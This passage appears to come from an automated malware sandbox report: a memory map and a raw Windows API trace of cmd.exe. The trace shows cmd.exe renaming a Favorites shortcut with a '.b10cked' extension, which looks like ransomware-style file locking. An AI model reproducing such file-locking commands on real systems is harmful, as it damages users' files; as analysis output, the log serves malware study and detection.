"c:\\windows\\system32\\usp10.dll") Region: id = 31616 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31617 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31618 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31619 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31620 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31621 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 31622 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 31623 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31624 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 31625 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 31626 start_va = 0x5b0000 end_va = 0x712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 31627 start_va = 0x7a0000 end_va = 0x139ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Thread: id = 728 os_tid = 0xa80 [0214.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf99c | out: lpSystemTimeAsFileTime=0x2cf99c*(dwLowDateTime=0xb47c80c0, dwHighDateTime=0x1d440a9)) [0214.223] GetCurrentProcessId () returned 0x134 [0214.223] GetCurrentThreadId () returned 0xa80 [0214.223] GetTickCount () returned 0x3c013 [0214.223] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf994 | out: lpPerformanceCount=0x2cf994*=27101255120) returned 1 [0214.224] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0214.224] __set_app_type (_Type=0x1) [0214.224] __p__fmode () returned 0x76b331f4 [0214.224] __p__commode () returned 0x76b331fc [0214.224] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0214.224] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0214.225] GetCurrentThreadId () returned 0xa80 [0214.225] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa80) returned 0x38 [0214.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0214.225] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0214.225] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.225] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf92c | out: phkResult=0x2cf92c*=0x0) returned 0x2 [0214.225] VirtualQuery (in: lpAddress=0x2cf963, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0214.225] GetConsoleOutputCP () returned 0x1b5 [0214.225] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.226] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0214.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0214.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.226] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.226] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.226] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.226] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0214.227] GetEnvironmentStringsW () returned 0x4c01b0* [0214.227] FreeEnvironmentStringsW (penv=0x4c01b0) returned 1 [0214.227] GetEnvironmentStringsW () returned 0x4c01b0* [0214.227] FreeEnvironmentStringsW (penv=0x4c01b0) returned 1 [0214.227] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce89c | out: phkResult=0x2ce89c*=0x40) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0xe8, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x0, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.227] RegCloseKey (hKey=0x40) returned 0x0 [0214.227] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce89c | out: phkResult=0x2ce89c*=0x40) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x0, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x9, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x9, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x9, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.228] RegCloseKey (hKey=0x40) returned 0x0 [0214.228] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b0 [0214.228] srand (_Seed=0x5b8863b0) [0214.228] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"" [0214.228] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"" [0214.228] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.229] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0214.229] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.229] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.229] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.229] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0214.229] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0214.229] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0214.229] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0214.229] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0214.229] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0214.229] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0214.229] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0214.229] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0214.229] GetEnvironmentStringsW () returned 0x4c2300* [0214.229] FreeEnvironmentStringsW (penv=0x4c2300) returned 1 [0214.229] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.229] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.229] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0214.230] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0214.230] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0214.230] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0214.230] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0214.230] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0214.230] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0214.230] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0214.230] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf668 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.230] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf668, lpFilePart=0x2cf664 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf664*="Desktop") returned 0x18 [0214.230] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0214.230] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf3e4 | out: lpFindFileData=0x2cf3e4) returned 0x4c0040 [0214.230] FindClose (in: hFindFile=0x4c0040 | out: hFindFile=0x4c0040) returned 1 [0214.230] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf3e4 | out: lpFindFileData=0x2cf3e4) returned 0x4c0040 [0214.230] FindClose (in: hFindFile=0x4c0040 | out: hFindFile=0x4c0040) returned 1 [0214.231] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf3e4 | out: lpFindFileData=0x2cf3e4) returned 0x4c0040 [0214.231] FindClose (in: hFindFile=0x4c0040 | out: hFindFile=0x4c0040) returned 1 [0214.231] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0214.231] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0214.231] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0214.231] GetEnvironmentStringsW () returned 0x4c2b20* [0214.231] FreeEnvironmentStringsW (penv=0x4c2b20) returned 1 [0214.231] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.232] GetConsoleOutputCP () returned 0x1b5 [0214.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.232] GetUserDefaultLCID () returned 0x409 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf7a8, cchData=128 | out: lpLCData="0") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf7a8, cchData=128 | out: lpLCData="0") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf7a8, cchData=128 | out: lpLCData="1") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0214.233] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0214.234] GetConsoleTitleW (in: lpConsoleTitle=0x4b0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.234] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0214.234] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0214.234] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0214.234] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0214.235] _wcsicmp (_String1="move", _String2=")") returned 68 [0214.235] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0214.235] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0214.235] _wcsicmp (_String1="IF", _String2="move") returned -4 [0214.235] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0214.235] _wcsicmp (_String1="REM", _String2="move") returned 5 [0214.235] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0214.238] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.239] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0214.239] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0214.239] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0214.239] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0214.239] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="CD") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="REN") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0214.239] _wcsicmp (_String1="move", _String2="SET") returned -6 [0214.239] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0214.239] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0214.239] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0214.239] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0214.239] _wcsicmp (_String1="move", _String2="MD") returned 11 [0214.239] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0214.239] _wcsicmp (_String1="move", _String2="RD") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0214.239] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0214.239] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0214.239] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0214.239] _wcsicmp (_String1="move", _String2="VER") returned -9 [0214.239] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0214.239] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0214.239] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0214.239] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0214.240] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0214.240] _wcsicmp (_String1="move", _String2="START") returned -6 [0214.240] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0214.240] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0214.240] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0214.241] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.241] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.241] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf25c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf254, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf254*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.243] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0214.243] _wcsicmp (_String1="MICROS~1.URL", _String2=".") returned 63 [0214.243] _wcsicmp (_String1="MICROS~1.URL", _String2="..") returned 63 [0214.243] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~1.url")) returned 0x20 [0214.244] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1e88 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.244] SetErrorMode (uMode=0x0) returned 0x0 [0214.244] SetErrorMode (uMode=0x1) returned 0x0 [0214.244] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", nBufferLength=0x104, lpBuffer=0x2cebe4, lpFilePart=0x2cebcc | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", lpFilePart=0x2cebcc*="MICROS~1.URL") returned 0x2f [0214.244] SetErrorMode (uMode=0x0) returned 0x1 [0214.244] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0214.244] _wcsicmp (_String1="MICROS~1.URL", _String2=".") returned 63 [0214.244] _wcsicmp (_String1="MICROS~1.URL", _String2="..") returned 63 [0214.244] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~1.url")) returned 0x20 [0214.333] SetErrorMode (uMode=0x0) returned 0x0 [0214.333] SetErrorMode (uMode=0x1) returned 0x0 [0214.333] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", nBufferLength=0x104, lpBuffer=0x2cf060, lpFilePart=0x2cedf8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", lpFilePart=0x2cedf8*="MICROS~1.URL") returned 0x2f [0214.333] SetErrorMode (uMode=0x0) returned 0x1 [0214.333] 